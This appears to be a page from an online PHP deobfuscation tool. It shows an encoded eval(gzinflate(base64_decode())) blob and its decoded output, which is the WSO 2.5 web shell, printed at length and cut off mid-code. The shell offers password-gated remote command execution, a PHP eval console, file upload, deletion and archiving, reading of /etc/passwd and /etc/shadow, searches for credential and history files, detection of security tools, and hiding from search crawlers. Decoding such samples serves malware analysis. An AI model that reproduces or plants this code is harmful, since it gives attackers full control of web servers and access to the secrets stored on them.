Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode( '7X37exo30+jPyV8hb3lraDAGnKSpMcSOYydOHTv1JVfnowsssPXC0t3F2E3..
Decoded Output download
eval( '$auth_pass = "827f26a1caf0d7b7a09080e1429d7512";
$color = "#df5";
$default_action = \'FilesMan\';
$default_use_ajax = true;
$default_charset = \'utf-8\';
if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) { header(\'HTTP/1.0 404 Not Found\'); exit; } } @ini_set(\'error_log\',NULL); @ini_set(\'log_errors\',0); @ini_set(\'max_execution_time\',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define(\'WSO_VERSION\', \'2.5\'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></pre>"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass)) WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = \'win\'; else $os = \'nix\'; $safe_mode = @ini_get(\'safe_mode\'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get(\'disable_functions\'); $home_cwd = @getcwd(); if(isset($_POST[\'c\'])) @chdir($_POST[\'c\']); $cwd = @getcwd(); if($os == \'win\') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if($cwd[strlen($cwd)-1] != \'/\') $cwd .= \'/\'; if(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'])) $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax; if($os == \'win\') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = $GLOBALS[\'default_charset\']; global $color; echo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . WSO_VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';
var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'
var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';
var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';
var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';
var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = \'ajax=true\';
for(i=0;i<d.mf.elements.length;i++)
params += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);
sr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject(\'Microsoft.XMLHTTP\');
if (req) {
req.onreadystatechange = processReqChange;
req.open(\'POST\', url, true);
req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\d+)([\\S\\s]*)\", \'m\');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert(\'Request error!\');
}
</script>
<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>
<form method=post name=mf style=\'display:none;\'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS[\'cwd\']); $totalSpace = @disk_total_space($GLOBALS[\'cwd\']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname(\'r\'); $kernel = @php_uname(\'s\'); $explink = \'http://exploit-db.com/search/?action=search&filter_description=\'; if(strpos(\'Linux\', $kernel) !== false) $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6)); else $explink .= urlencode($kernel . \' \' . substr($release,0,3)); if(!function_exists(\'posix_getegid\')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[\'name\']; $uid = $uid[\'uid\']; $group = $gid[\'name\']; $gid = $gid[\'gid\']; } $cwd_links = \'\'; $path = explode("/", $GLOBALS[\'cwd\']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].\'/\'; $cwd_links .= "\")\'>".$path[$i]."/</a>"; } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\'); $opt_charsets = \'\'; foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\'; $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\'); if(!empty($GLOBALS[\'auth_pass\'])) $m[\'Logout\'] = \'Logout\'; $m[\'Self remove\'] = \'SelfRemove\'; $menu = \'\'; foreach($m as $k => $v) $menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\'\'.$v.\'\',null,\'\',\'\',\'\')">\'.$k.\'</a> ]</th>\'; $drives = ""; if($GLOBALS[\'os\'] == \'win\') { foreach(range(\'c\',\'z\') as $drive) if(is_dir($drive.\':\\')) $drives .= \'<a href="#" onclick="g(\'FilesMan\',\'\'.$drive.\':/\')">[ \'.$drive.\' ]</a> \'; } echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\' . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\') . \' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\'FilesMan\',\'\' . $GLOBALS[\'home_cwd\'] . \'\',\'\',\'\',\'\')">[ home ]</a><br>\' . $drives . \'</td>\' . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\' . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\'; } function wsoFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'green\'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>
<tr>
<td><form onsubmit=\'g(null,this.c.value,\"\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>
<td><form onsubmit=\"g(\'FilesTools\',null,this.f.value);return false;\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>
</tr><tr>
<td><form onsubmit=\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>
<td><form onsubmit=\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>
</tr><tr>
<td><form onsubmit=\"g(\'Console\',null,this.c.value);return false;\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>
<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>
<input type=hidden name=a value=\'FilesMAn\'>
<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>
<input type=hidden name=p1 value=\'uploadFile\'>
<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>
<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>
</tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = \'\'; if (function_exists(\'exec\')) { @exec($in,$out); $out = @join("
",$out); } elseif (function_exists(\'passthru\')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists(\'system\')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\'; elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\'; elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\'; else return $s . \' B\'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\'; elseif (($p & 0xA000) == 0xA000)$i = \'l\'; elseif (($p & 0x8000) == 0x8000)$i = \'-\'; elseif (($p & 0x6000) == 0x6000)$i = \'b\'; elseif (($p & 0x4000) == 0x4000)$i = \'d\'; elseif (($p & 0x2000) == 0x2000)$i = \'c\'; elseif (($p & 0x1000) == 0x1000)$i = \'p\'; else $i = \'u\'; $i .= (($p & 0x0100) ? \'r\' : \'-\'); $i .= (($p & 0x0080) ? \'w\' : \'-\'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\')); $i .= (($p & 0x0020) ? \'r\' : \'-\'); $i .= (($p & 0x0010) ? \'w\' : \'-\'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\')); $i .= (($p & 0x0004) ? \'r\' : \'-\'); $i .= (($p & 0x0002) ? \'w\' : \'-\'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\'; elseif (!@is_writable($f)) return \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\'; else return \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\'; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx(\'which \' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo \'<h1>Server security information</h1><div class=content>\'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo \'<span>\' . $n . \': </span>\'; if(strpos($v, "
") === false) echo $v . \'<br>\'; else echo \'<pre class=ml1>\' . $v . \'</pre>\'; } } wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); if(function_exists(\'apache_get_modules\')) wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules())); wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\'); wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\')); wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\'); $temp=array(); if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL"; if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL"; if(function_exists(\'oci_connect\')) $temp[] = "Oracle"; wsoSecParam(\'Supported databases\', implode(\', \', $temp)); echo \'<br>\'; if($GLOBALS[\'os\'] == \'nix\') { wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"/etc/\", \"passwd\")\'>[view]</a>":\'no\'); wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"/etc/\", \"shadow\")\'>[view]</a>":\'no\'); wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\')); wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\')); if(!$GLOBALS[\'safe_mode\']) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\'); $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\'); $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\'); echo \'<br>\'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam(\'Userful\', implode(\', \',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam(\'Danger\', implode(\', \',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam(\'Downloaders\', implode(\', \',$temp)); echo \'<br/>\'; wsoSecParam(\'HDD space\', wsoEx(\'df -h\')); wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\')); echo \'<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\'; if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) { $temp = ""; for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) { $uid = @posix_getpwuid($_POST[\'p2\']); if ($uid) $temp .= join(\':\',$uid)."
"; } echo \'<br/>\'; wsoSecParam(\'Users\', $temp); } } } else { wsoSecParam(\'OS Version\',wsoEx(\'ver\')); wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\')); wsoSecParam(\'User Accounts\',wsoEx(\'net user\')); } echo \'</div>\'; wsoFooter(); } function actionPhp() { if(isset($_POST[\'ajax\'])) { WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true); ob_start(); eval($_POST[\'p1\']); $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "
\\'") . "\';
"; echo strlen($temp), "
", $temp; exit; } if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\'])) WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0); wsoHeader(); if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) { echo \'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>\'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( \'!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU\', \'!td, th {(.*)}!msiU\', \'!<img[^>]+>!msiU\', ), array ( \'\', \'.e, .v, .h, .h th {$1}\', \'\' ), $tmp); echo str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\'; } echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\'; echo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\'; if(!empty($_POST[\'p1\'])) { ob_start(); eval($_POST[\'p1\']); echo htmlspecialchars(ob_get_clean()); } echo \'</pre></div>\'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE[\'f\'])) $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']); if(!empty($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!"; break; case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir"; break; case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { if($f == \'..\') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case \'paste\': if($_COOKIE[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[\'f\'] as $f) copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']); } elseif($_COOKIE[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[\'f\'] as $f) @rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f); } elseif($_COOKIE[\'act\'] == \'zip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); if ($zip->open($_POST[\'p2\'], 1)) { chdir($_COOKIE[\'c\']); foreach($_COOKIE[\'f\'] as $f) { if($f == \'..\') continue; if(@is_file($_COOKIE[\'c\'].$f)) $zip->addFile($_COOKIE[\'c\'].$f, $f); elseif(@is_dir($_COOKIE[\'c\'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS[\'cwd\']); $zip->close(); } } } elseif($_COOKIE[\'act\'] == \'unzip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); foreach($_COOKIE[\'f\'] as $f) { if($zip->open($_COOKIE[\'c\'].$f)) { $zip->extractTo($GLOBALS[\'cwd\']); $zip->close(); } } } } elseif($_COOKIE[\'act\'] == \'tar\') { chdir($_COOKIE[\'c\']); $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']); wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\'])); chdir($GLOBALS[\'cwd\']); } unset($_COOKIE[\'f\']); setcookie(\'f\', \'\', time() - 3600); break; default: if(!empty($_POST[\'p1\'])) { WSOsetcookie(\'act\', $_POST[\'p1\']); WSOsetcookie(\'f\', serialize(@$_POST[\'f\'])); WSOsetcookie(\'c\', @$_POST[\'c\']); } break; } } wsoHeader(); echo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\'; $dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']); if($dirContent === false) { echo \'Can\'t open this folder!\';wsoFooter(); return; } global $sort; $sort = array(\'name\', 1); if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == \'checkbox\')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")\'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])), \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\')); elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\']))); elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\')); } $GLOBALS[\'sort\'] = $sort; function wsoCmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1); else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo 